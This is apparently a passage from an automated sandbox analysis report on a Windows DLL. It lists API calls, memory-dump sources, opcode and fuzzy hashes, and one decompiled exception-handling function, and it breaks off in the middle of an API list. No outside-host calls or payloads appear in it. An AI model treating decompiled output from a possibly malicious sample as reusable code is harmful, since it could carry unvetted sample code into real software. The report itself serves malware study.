                                                                                                                0x6e1f2562
                                                                                                                0x6e1f2568
                                                                                                                0x6e1f256a
                                                                                                                0x6e1f256c
                                                                                                                0x6e1f2581
                                                                                                                0x6e1f2581
                                                                                                                0x6e1f2583
                                                                                                                0x6e1f25b2
                                                                                                                0x6e1f25b9
                                                                                                                0x00000000
                                                                                                                0x6e1f25b9
                                                                                                                0x6e1f2587
                                                                                                                0x6e1f2588
                                                                                                                0x6e1f258a
                                                                                                                0x6e1f258c
                                                                                                                0x6e1f258c
                                                                                                                0x6e1f258e
                                                                                                                0x6e1f2590
                                                                                                                0x6e1f2592
                                                                                                                0x6e1f25a6
                                                                                                                0x6e1f25a6
                                                                                                                0x6e1f25a9
                                                                                                                0x6e1f25ab
                                                                                                                0x6e1f25ab
                                                                                                                0x6e1f25ac
                                                                                                                0x6e1f25ac
                                                                                                                0x00000000
                                                                                                                0x6e1f2594
                                                                                                                0x6e1f2594
                                                                                                                0x6e1f2594
                                                                                                                0x6e1f259d
                                                                                                                0x6e1f259e
                                                                                                                0x6e1f25a0
                                                                                                                0x6e1f25a2
                                                                                                                0x6e1f25a2
                                                                                                                0x00000000
                                                                                                                0x6e1f2594
                                                                                                                0x6e1f2592
                                                                                                                0x6e1f256e
                                                                                                                0x6e1f2575
                                                                                                                0x6e1f2575
                                                                                                                0x6e1f2577
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2579
                                                                                                                0x6e1f257a
                                                                                                                0x6e1f257d
                                                                                                                0x6e1f257f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f257f
                                                                                                                0x00000000
                                                                                                                0x6e1f2575
                                                                                                                0x6e1f24f8
                                                                                                                0x6e1f24fb
                                                                                                                0x6e1f2500
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2509
                                                                                                                0x6e1f250b
                                                                                                                0x6e1f2511
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2517
                                                                                                                0x6e1f251d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2523
                                                                                                                0x6e1f2525
                                                                                                                0x6e1f252e
                                                                                                                0x6e1f2532
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2538
                                                                                                                0x6e1f253b
                                                                                                                0x6e1f253d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2544
                                                                                                                0x6e1f2546
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2548
                                                                                                                0x6e1f254c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f254c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2437
                                                                                                                0x6e1f2437
                                                                                                                0x6e1f2437
                                                                                                                0x6e1f243e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2440
                                                                                                                0x6e1f2441
                                                                                                                0x6e1f2443
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2443
                                                                                                                0x6e1f246b
                                                                                                                0x6e1f246d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f247d
                                                                                                                0x6e1f247f
                                                                                                                0x6e1f2481
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2487
                                                                                                                0x6e1f248e
                                                                                                                0x6e1f24ba
                                                                                                                0x6e1f24ba
                                                                                                                0x6e1f24bc
                                                                                                                0x6e1f24be
                                                                                                                0x6e1f24d2
                                                                                                                0x6e1f24d4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f24c0
                                                                                                                0x6e1f24c0
                                                                                                                0x6e1f24c0
                                                                                                                0x6e1f24c9
                                                                                                                0x6e1f24ca
                                                                                                                0x6e1f24cc
                                                                                                                0x6e1f24ce
                                                                                                                0x6e1f24ce
                                                                                                                0x00000000
                                                                                                                0x6e1f24c0
                                                                                                                0x6e1f2490
                                                                                                                0x6e1f2493
                                                                                                                0x6e1f2495
                                                                                                                0x6e1f24a7
                                                                                                                0x6e1f24a7
                                                                                                                0x6e1f24aa
                                                                                                                0x6e1f24ac
                                                                                                                0x6e1f24ac
                                                                                                                0x6e1f24ad
                                                                                                                0x6e1f24ad
                                                                                                                0x6e1f24b3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2497
                                                                                                                0x6e1f2497
                                                                                                                0x6e1f2497
                                                                                                                0x6e1f249e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f24a0
                                                                                                                0x6e1f24a0
                                                                                                                0x6e1f24a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f24a1
                                                                                                                0x6e1f24a3
                                                                                                                0x6e1f24a5
                                                                                                                0x6e1f24b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f24b8
                                                                                                                0x00000000
                                                                                                                0x6e1f24a5
                                                                                                                0x6e1f2417
                                                                                                                0x6e1f241a
                                                                                                                0x6e1f241d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f241f
                                                                                                                0x6e1f2421
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2421
                                                                                                                0x6e1f23e6
                                                                                                                0x6e1f23e8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E1F2456
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MemoryQueryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2850889275-0
                                                                                                                • Opcode ID: 5130a6c217c252658baec1b1935188286048d1870c1b8ca80a29218f43d0859c
                                                                                                                • Instruction ID: fb614d49cd74381b22ca79dea6325143c82b2df53106ba24f3cd0c0d294c2ac7
                                                                                                                • Opcode Fuzzy Hash: 5130a6c217c252658baec1b1935188286048d1870c1b8ca80a29218f43d0859c
                                                                                                                • Instruction Fuzzy Hash: D261F470704A86CFEB59CFA8D8A069937F5AB55315B348528D416C7194F770D8C3E6D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • EnumSystemLocalesW.KERNEL32(6E22298C,00000001,?,6E22E7C2,6E22E860,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6E2229CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2099609381-0
                                                                                                                • Opcode ID: 2beca46405fd08b95fdc83f0c0c8d176f00e8e33eefb49921410183d03f1d1b2
                                                                                                                • Instruction ID: ba9e976f6fd645d8709a015e7d18cd1f1b9fc42694e5da8c3870266c49fe419b
                                                                                                                • Opcode Fuzzy Hash: 2beca46405fd08b95fdc83f0c0c8d176f00e8e33eefb49921410183d03f1d1b2
                                                                                                                • Instruction Fuzzy Hash: 7DE0467205060DAFDF01CFA0C849B693BE6BB09312F448460B50C5B540C272A0A0DF64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(6E21CBFF,6E249188,00000008,6E21CDD5,?,00000001,?,6E2491A8,0000000C,6E21CD74,?,00000001,?), ref: 6E223484
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HeapProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 54951025-0
                                                                                                                • Opcode ID: 3fbd09d1ea64e4267c1b419970725d88138b12be6fa0b76d1e6302ecf866705e
                                                                                                                • Instruction ID: 0ee58c7334fe325201ee785d7239cda81bc227b6a25e86f4725acc2da13a3987
                                                                                                                • Opcode Fuzzy Hash: 3fbd09d1ea64e4267c1b419970725d88138b12be6fa0b76d1e6302ecf866705e
                                                                                                                • Instruction Fuzzy Hash: 8EB012B0301A1247CF1C0B39541D10937D59749301340407D7003C1540DF20C850DF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E6E1F2184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				void* __ebp;
                                                                                                                				signed int* _t43;
                                                                                                                				char _t44;
                                                                                                                				void* _t46;
                                                                                                                				void* _t49;
                                                                                                                				intOrPtr* _t53;
                                                                                                                				void* _t54;
                                                                                                                				void* _t65;
                                                                                                                				long _t66;
                                                                                                                				signed int* _t80;
                                                                                                                				signed int* _t82;
                                                                                                                				void* _t84;
                                                                                                                				signed int _t86;
                                                                                                                				void* _t89;
                                                                                                                				void* _t95;
                                                                                                                				void* _t96;
                                                                                                                				void* _t99;
                                                                                                                				void* _t106;
                                                                                                                
                                                                                                                				_t43 = _t84;
                                                                                                                				_t65 = __ebx + 2;
                                                                                                                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                				_t89 = _t95;
                                                                                                                				_t96 = _t95 - 8;
                                                                                                                				_push(_t65);
                                                                                                                				_push(_t84);
                                                                                                                				_push(_t89);
                                                                                                                				asm("cld");
                                                                                                                				_t66 = _a8;
                                                                                                                				_t44 = _a4;
                                                                                                                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                					_push(_t89);
                                                                                                                					E6E1F22EB(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                					_t46 = 1;
                                                                                                                				} else {
                                                                                                                					_v12 = _t44;
                                                                                                                					_v8 = _a12;
                                                                                                                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                					_t86 =  *(_t66 + 0xc);
                                                                                                                					_t80 =  *(_t66 + 8);
                                                                                                                					_t49 = E6E1F23A5(_t66);
                                                                                                                					_t99 = _t96 + 4;
                                                                                                                					if(_t49 == 0) {
                                                                                                                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                						goto L11;
                                                                                                                					} else {
                                                                                                                						while(_t86 != 0xffffffff) {
                                                                                                                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                							if(_t53 == 0) {
                                                                                                                								L8:
                                                                                                                								_t80 =  *(_t66 + 8);
                                                                                                                								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								_t54 =  *_t53();
                                                                                                                								_t89 = _t89;
                                                                                                                								_t86 = _t86;
                                                                                                                								_t66 = _a8;
                                                                                                                								_t55 = _t54;
                                                                                                                								_t106 = _t54;
                                                                                                                								if(_t106 == 0) {
                                                                                                                									goto L8;
                                                                                                                								} else {
                                                                                                                									if(_t106 < 0) {
                                                                                                                										_t46 = 0;
                                                                                                                									} else {
                                                                                                                										_t82 =  *(_t66 + 8);
                                                                                                                										E6E1F2290(_t55, _t66);
                                                                                                                										_t89 = _t66 + 0x10;
                                                                                                                										E6E1F22EB(_t89, _t66, 0);
                                                                                                                										_t99 = _t99 + 0xc;
                                                                                                                										E6E1F2387(_t82[2]);
                                                                                                                										 *(_t66 + 0xc) =  *_t82;
                                                                                                                										_t66 = 0;
                                                                                                                										_t86 = 0;
                                                                                                                										 *(_t82[2])(1);
                                                                                                                										goto L8;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L13;
                                                                                                                						}
                                                                                                                						L11:
                                                                                                                						_t46 = 1;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L13:
                                                                                                                				return _t46;
                                                                                                                			}























                                                                                                                0x6e1f2188
                                                                                                                0x6e1f2189
                                                                                                                0x6e1f218a
                                                                                                                0x6e1f218d
                                                                                                                0x6e1f218f
                                                                                                                0x6e1f2192
                                                                                                                0x6e1f2193
                                                                                                                0x6e1f2195
                                                                                                                0x6e1f2196
                                                                                                                0x6e1f2197
                                                                                                                0x6e1f219a
                                                                                                                0x6e1f21a4
                                                                                                                0x6e1f2255
                                                                                                                0x6e1f225c
                                                                                                                0x6e1f2265
                                                                                                                0x6e1f21aa
                                                                                                                0x6e1f21aa
                                                                                                                0x6e1f21b0
                                                                                                                0x6e1f21b6
                                                                                                                0x6e1f21b9
                                                                                                                0x6e1f21bc
                                                                                                                0x6e1f21c0
                                                                                                                0x6e1f21c5
                                                                                                                0x6e1f21ca
                                                                                                                0x6e1f224a
                                                                                                                0x00000000
                                                                                                                0x6e1f21cc
                                                                                                                0x6e1f21cc
                                                                                                                0x6e1f21d8
                                                                                                                0x6e1f21da
                                                                                                                0x6e1f2235
                                                                                                                0x6e1f2235
                                                                                                                0x6e1f223b
                                                                                                                0x00000000
                                                                                                                0x6e1f21dc
                                                                                                                0x6e1f21eb
                                                                                                                0x6e1f21ed
                                                                                                                0x6e1f21ee
                                                                                                                0x6e1f21ef
                                                                                                                0x6e1f21f2
                                                                                                                0x6e1f21f2
                                                                                                                0x6e1f21f4
                                                                                                                0x00000000
                                                                                                                0x6e1f21f6
                                                                                                                0x6e1f21f6
                                                                                                                0x6e1f2240
                                                                                                                0x6e1f21f8
                                                                                                                0x6e1f21f8
                                                                                                                0x6e1f21fc
                                                                                                                0x6e1f2204
                                                                                                                0x6e1f2209
                                                                                                                0x6e1f220e
                                                                                                                0x6e1f221a
                                                                                                                0x6e1f2222
                                                                                                                0x6e1f2229
                                                                                                                0x6e1f222f
                                                                                                                0x6e1f2233
                                                                                                                0x00000000
                                                                                                                0x6e1f2233
                                                                                                                0x6e1f21f6
                                                                                                                0x6e1f21f4
                                                                                                                0x00000000
                                                                                                                0x6e1f21da
                                                                                                                0x6e1f224e
                                                                                                                0x6e1f224e
                                                                                                                0x6e1f224e
                                                                                                                0x6e1f21ca
                                                                                                                0x6e1f226a
                                                                                                                0x6e1f2271

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                • Instruction ID: 3c5099f25826ff087e34c236c310a0c908b4a1aaea059ed350b99d4d53d6bd3b
                                                                                                                • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                • Instruction Fuzzy Hash: A421D672900245DFD700DFA8DC809ABB7E9FF49350B058468D9198B245DB30FA56DBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.493360055.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                • Instruction ID: a809065028fa7fc9eae307e9d95acfe7988031bd9fd7cdfe6c807587327fbfef
                                                                                                                • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                • Instruction Fuzzy Hash: 02119377340505DFD758DE99DC90EA273EBEBA9230B25816AED04CB305D675E841CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.493360055.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                • Instruction ID: 6af46625d6bf2392fb366cbecfb3e7e3e5bb25e1300e657b956a21da3e7137b8
                                                                                                                • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                • Instruction Fuzzy Hash: 0101F97235820ACFEB4CCF6DD994D6AB7E5EBC2735B15C07EC4468B615D130E845CA10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlDecodePointer.NTDLL ref: 6E222EC5
                                                                                                                • _free.LIBCMT ref: 6E222EDE
                                                                                                                  • Part of subcall function 6E21B190: HeapFree.KERNEL32(00000000,00000000,?,6E2249A1,00000000,?,?,?,00000000,?,6E21CF78,00000018,6E2491C8,00000008,6E21CEC5,?), ref: 6E21B1A4
                                                                                                                  • Part of subcall function 6E21B190: GetLastError.KERNEL32(00000000,?,6E2249A1,00000000,?,?,?,00000000,?,6E21CF78,00000018,6E2491C8,00000008,6E21CEC5,?,6E2117F0), ref: 6E21B1B6
                                                                                                                • _free.LIBCMT ref: 6E222EF1
                                                                                                                • _free.LIBCMT ref: 6E222F0F
                                                                                                                • _free.LIBCMT ref: 6E222F21
                                                                                                                • _free.LIBCMT ref: 6E222F32
                                                                                                                • _free.LIBCMT ref: 6E222F3D
                                                                                                                • _free.LIBCMT ref: 6E222F61
                                                                                                                • RtlEncodePointer.NTDLL(6E2E1328), ref: 6E222F68
                                                                                                                • _free.LIBCMT ref: 6E222F7D
                                                                                                                • _free.LIBCMT ref: 6E222F93
                                                                                                                • _free.LIBCMT ref: 6E222FBB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3064303923-0
                                                                                                                • Opcode ID: 5b5bb7c9301ef248a3c30a0e7afd35ec5b24d1b92594c4c4de5e6a5d03010440
                                                                                                                • Instruction ID: 799979962d3cdf6e5a6397446c016b0074f5cbbe36725c32146b60193166ad93
                                                                                                                • Opcode Fuzzy Hash: 5b5bb7c9301ef248a3c30a0e7afd35ec5b24d1b92594c4c4de5e6a5d03010440
                                                                                                                • Instruction Fuzzy Hash: 802191B7905A6ACFCF189FA4D84C4D937FBA70E7213560439E50897248CB319884CAA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: _strcspnctypestd::ios_base::getloc$Mpunct_localeconvstd::ios_base::width
                                                                                                                • String ID: @
                                                                                                                • API String ID: 484443084-2766056989
                                                                                                                • Opcode ID: 902d90ec1dbd6a6bff5a6f224e5f3ff10c48eb46573f78ad390fbe1b9762889e
                                                                                                                • Instruction ID: 68172b4438070352d91321e7d46cf41d073ba7545916c9854bd47da757fb5693
                                                                                                                • Opcode Fuzzy Hash: 902d90ec1dbd6a6bff5a6f224e5f3ff10c48eb46573f78ad390fbe1b9762889e
                                                                                                                • Instruction Fuzzy Hash: 3C021BB591424DDFCB04CFD8C990BEEBBFABF48304F148559E619AB254D734AA41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21314A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213163
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID: xD!n
                                                                                                                • API String ID: 172949856-3737725903
                                                                                                                • Opcode ID: d96d8b36e82e3bf78a0dc4e6e46db0319e29a104ad00c1452de9462ce398307a
                                                                                                                • Instruction ID: 1526b63b973e07b94f63ec4948504a02cb27956ec9b3f848b82e6ea837ad7c94
                                                                                                                • Opcode Fuzzy Hash: d96d8b36e82e3bf78a0dc4e6e46db0319e29a104ad00c1452de9462ce398307a
                                                                                                                • Instruction Fuzzy Hash: 4C31E5B591821DDFCB08CFD4C885AEEB7FABB48314F104629E525A7380DB345A05CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::ios_base::getloc$Mpunctctypestd::ios_base::width
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2441703863-2766056989
                                                                                                                • Opcode ID: 7dc808567650502c7f0f2f498eaf718fc9a92b0a3f6abd0c1f725c9ebac6b586
                                                                                                                • Instruction ID: 9e17f60067dce32cf3ccb629134599fd5f2ec4cf591a07700114c87b57f43bdf
                                                                                                                • Opcode Fuzzy Hash: 7dc808567650502c7f0f2f498eaf718fc9a92b0a3f6abd0c1f725c9ebac6b586
                                                                                                                • Instruction Fuzzy Hash: 2DE129B591424D9FCB04CF94C990BEEBBFABF48304F14855DE619AB254D734AE41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traits$_strlenctypestd::ios_base::getlocstd::ios_base::width
                                                                                                                • String ID:
                                                                                                                • API String ID: 2376101104-0
                                                                                                                • Opcode ID: d0c6eebec1b5825cc0edb6de61a1b31256547073392af8b85d58de306a92d1db
                                                                                                                • Instruction ID: e01b2be2b7cdd61ea19651d234833147f6917c1b003d61b7ba67f9e81d0cb02a
                                                                                                                • Opcode Fuzzy Hash: d0c6eebec1b5825cc0edb6de61a1b31256547073392af8b85d58de306a92d1db
                                                                                                                • Instruction Fuzzy Hash: 75D106B990424D9FDB08CFE4C490BEEBBF6BF49308F108519E605AB350DB34AA41DB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6E219B62
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E219B6C
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E219B83
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                • codecvt.LIBCPMT ref: 6E219BA6
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 6E219BBA
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 6E219BC8
                                                                                                                • std::_Facet_Register.LIBCPMT ref: 6E219BDE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1512642153-0
                                                                                                                • Opcode ID: abcf18ad089c7f56547f3e686bf2d833d332b21dfecf0e07f77a0f88c6e9ebc0
                                                                                                                • Instruction ID: f56be8d723a8534da3fbe536a98ba0d05944990958eaff0203f1474324218119
                                                                                                                • Opcode Fuzzy Hash: abcf18ad089c7f56547f3e686bf2d833d332b21dfecf0e07f77a0f88c6e9ebc0
                                                                                                                • Instruction Fuzzy Hash: 3D015B7A91812D9BCF09DBE0C804AEE73BFAF44659F210925E611AB290DF349B15CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21324A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213263
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 172949856-0
                                                                                                                • Opcode ID: 068503c4cd893672f925eae8312afaeaa9a4c8984b1dd976c0757d6dadb611c6
                                                                                                                • Instruction ID: d6602f3f3874595b9d2e03d27138265d8c17a9c7fc5d24b023864ff8ece87846
                                                                                                                • Opcode Fuzzy Hash: 068503c4cd893672f925eae8312afaeaa9a4c8984b1dd976c0757d6dadb611c6
                                                                                                                • Instruction Fuzzy Hash: E431E5B5D1821D9FCB08DFD4C985AEEB7FABB49314F104629E525A7380DB345A40CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CurrentThread__calloc_crt__initptd__mtinitlocks__mtterm
                                                                                                                • String ID:
                                                                                                                • API String ID: 2314865971-0
                                                                                                                • Opcode ID: e2fd357471b6e8576f41e2335edaf411aed2342827a90aac2887e03cad9011d4
                                                                                                                • Instruction ID: 193701162b87c6eeec388bf35060330a4c2fb60c51fde7c7bf291a493be531ed
                                                                                                                • Opcode Fuzzy Hash: e2fd357471b6e8576f41e2335edaf411aed2342827a90aac2887e03cad9011d4
                                                                                                                • Instruction Fuzzy Hash: 2BF0C23A10C62A9FE624ABF47C256CF26CBDF01239F200A3AE161D81C4EF1185428598
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ____lc_codepage_func.LIBCMT ref: 6E2193E3
                                                                                                                • __calloc_crt.LIBCMT ref: 6E2193F4
                                                                                                                  • Part of subcall function 6E21E636: __calloc_impl.LIBCMT ref: 6E21E645
                                                                                                                • ___pctype_func.LIBCMT ref: 6E219407
                                                                                                                • _memmove.LIBCMT ref: 6E219410
                                                                                                                • ___pctype_func.LIBCMT ref: 6E219421
                                                                                                                • ____lc_locale_name_func.LIBCMT ref: 6E21942D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1321936363-0
                                                                                                                • Opcode ID: 932108458979f3f6dd7fc7252e6eba9902aad8bbf6f8d763a73a1398a0ba792f
                                                                                                                • Instruction ID: 87b7b6b341383b7bbb14d6da5a7ba23d3512dbeaaee18b1799c286f58cc9e807
                                                                                                                • Opcode Fuzzy Hash: 932108458979f3f6dd7fc7252e6eba9902aad8bbf6f8d763a73a1398a0ba792f
                                                                                                                • Instruction Fuzzy Hash: CDF0AFB990C70A9BE7109BE59800ACA77D9AF0071AF00CC29E69887680DB74E6008B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __Getcvt.LIBCPMT ref: 6E21956A
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,?,00000002,00000000,00000000), ref: 6E2195B8
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,00000001,00000001,00000000,00000000), ref: 6E21962E
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,00000001,00000001,00000000,00000000), ref: 6E219656
